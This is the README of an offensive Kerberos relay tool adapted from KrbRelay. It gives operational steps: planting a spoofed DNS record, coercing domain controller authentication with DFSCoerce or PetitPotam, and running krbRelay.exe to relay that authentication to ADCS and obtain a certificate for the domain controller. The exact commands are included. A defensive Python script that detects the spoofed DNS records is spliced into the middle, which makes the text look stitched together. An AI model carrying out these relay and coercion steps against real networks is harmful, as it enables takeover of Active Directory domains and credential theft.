This krbrelay version acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP.
It's 90% based on @cube0x0's KrbRelay: https://github.com/cube0x0/KrbRelay
To control the SPN for relaying, James Forshaw's CredMarshalTargetInfo() trick is required: https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
Create a DNS entry for the target server name you want to relay the Kerberos AP-REQ as: the record name is `<server_name>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA` (the target host name with the marshalled target-info suffix appended), and it must resolve to your listener/relay IP.
Domain users can typically perform secure DNS updates; for example, the PowerShell script Invoke-DNSUpdate (https://github.com/Kevin-Robertson/Powermad) can add such a DNS entry.
Trigger the SMB authentication with a third-party tool, for example DFSCoerce (https://github.com/Wh04m1001/DFSCoerce), PetitPotam (https://github.com/topotam/PetitPotam), etc., and relay it to the attacker machine.
Given that the relay must listen on SMB port 445, you have two options on the Windows attacker machine:
- use a Linux box acting as a redirector
- disable the SERVER service on your Windows machine -> you can use smb_control.bat to perform these tasks.
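The marshalled DNS entry described above is also the artifact a defender can look for: a host record whose label ends in the target-info suffix, or whose label otherwise looks like a base64 blob, is a strong signal that someone is staging a Kerberos relay against the name it shadows. The following script is an added example (not part of this project's code) that scans a zone export in `name,type,data` CSV form (a format assumed here for illustration; a constructed sample is embedded) and reports such records together with the existing host they impersonate. The long-run-of-'A' check is a heuristic assumption, not something the README states.

```python
import csv
import io
import re
from typing import Dict, List, Optional

# Suffix from this README's example DNS entry: the tool expects a record named
# <server_name> followed by this marshalled target-info blob.
KNOWN_MARSHALLED_SUFFIX = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"

# Heuristic (assumption, not from the README): marshalled target info is a
# base64-like blob in which zeroed fields encode as long runs of 'A'.
# Ordinary host labels essentially never contain ten or more consecutive 'A's.
LONG_A_RUN = re.compile(r"A{10,}")

# Constructed sample zone export (not real data): one benign set of hosts, one
# record carrying the exact suffix from the README, one generic base64-looking label.
SAMPLE_ZONE_CSV = """\
name,type,data
dc-2,A,10.0.0.10
adcs-mylab,A,10.0.0.20
adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,A,10.0.0.99
fileserver01,A,10.0.0.30
backupAAAAAAAAAAAAAAAAAAAA,A,10.0.0.98
"""


def parse_zone_csv(text: str) -> List[Dict[str, str]]:
    """Parse a 'name,type,data' export (header row required) into row dicts."""
    return list(csv.DictReader(io.StringIO(text)))


def classify_label(label: str) -> Optional[str]:
    """Return a reason string if the DNS label looks like a marshalled target, else None."""
    if label.endswith(KNOWN_MARSHALLED_SUFFIX):
        return "known_marshalled_suffix"
    if LONG_A_RUN.search(label):
        return "long_A_run"
    return None


def find_suspicious_records(text: str) -> List[Dict[str, Optional[str]]]:
    """Scan a zone export and list records whose label looks marshalled.

    For a record with the known suffix, also report which existing A record
    (the label with the suffix stripped) it would let an attacker pose as.
    """
    rows = parse_zone_csv(text)
    a_names = {r["name"].lower() for r in rows if r["type"].upper() == "A"}
    hits: List[Dict[str, Optional[str]]] = []
    for r in rows:
        label = r["name"]
        reason = classify_label(label)
        if reason is None:
            continue
        base = None
        if reason == "known_marshalled_suffix":
            base = label[: -len(KNOWN_MARSHALLED_SUFFIX)]
        impersonates = base if base and base.lower() in a_names else None
        hits.append({
            "name": label,
            "data": r["data"],
            "reason": reason,
            "impersonates": impersonates,
        })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_records(SAMPLE_ZONE_CSV):
        print(hit)
```

Run it against a real export by replacing `SAMPLE_ZONE_CSV` with the contents of your zone dump; any hit whose `impersonates` field names a domain controller or ADCS host deserves immediate attention, since that is exactly the shadow record the relay in this README depends on.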
This is a quick & dirty adaptation of the original project, leaving cleanup and optimization to you ;)
Relay the DC SMB authentication to the HTTP (ADCS) web enrollment endpoint and request a client certificate, using a Linux box that redirects to the Windows attacker machine on port 9999:

```
krbRelay.exe -spn http/adcs-mylab.mylab.local -redirecthost adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 9999
```

In another window:

```
DFSCoerce.exe -l adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -t DC-2
```
(https://github.com/decoder-it/DFSCoerce-exe-2)
# Special command line switches:
-listener: relay listener port
-redirecthost: relay server/redirector mapped to the special DNS entry <server_name>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
For detailed usage and the remaining command line switches, refer to the original KrbRelay tool.